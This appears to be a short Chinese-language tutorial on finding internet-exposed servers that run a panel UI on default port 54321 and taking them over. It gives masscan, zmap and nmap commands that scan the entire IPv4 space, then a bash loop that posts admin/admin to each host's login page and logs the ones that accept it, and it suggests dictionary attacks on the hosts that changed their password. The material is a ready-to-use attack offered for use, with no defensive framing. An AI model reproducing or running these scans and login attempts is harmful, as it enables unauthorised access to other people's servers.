准備#
- Debian 或 Ubuntu 伺服器
安裝工具#
apt install -y nmap zmap masscan
粗掃#
masscan
masscan 0.0.0.0/0 -p54321 --banners --exclude 255.255.255.255 -oJ scan.json
zmap
zmap --target-port=54321 --output-file=scan.log
nmap
nmap -sS 0.0.0.0/0 -p 54321 | grep -v failed > scan.log
弱口令登錄#
早年一些某 ui 的一鍵安裝腳本採用 admin/admin 的弱密碼,很多人都懶得改,因此可以針對開放默認端口 54321 的伺服器逐一嘗試登錄
#!/bin/bash
for ip_ad in $(sed -nE 's/.*"ip": "([^"]+)".*/\1/p' scan.json); do
if curl --max-time 1 http://$ip_ad:54321; then
res=$(curl "http://${ip_ad}:54321/login" --data-raw 'username=admin&password=admin' --compressed --insecure)
if [[ "$res" =~ .*true.* ]]; then
echo $ip_ad | tee >> week.log
fi
echo $ip_ad | tee >> all.log
fi
done;
week.log 裡面就是所有掃出來的可以弱口令登錄的機器,挺容易掃出來的
all.log 是改了密碼的機器,有興趣可以嘗試進一步字典枚舉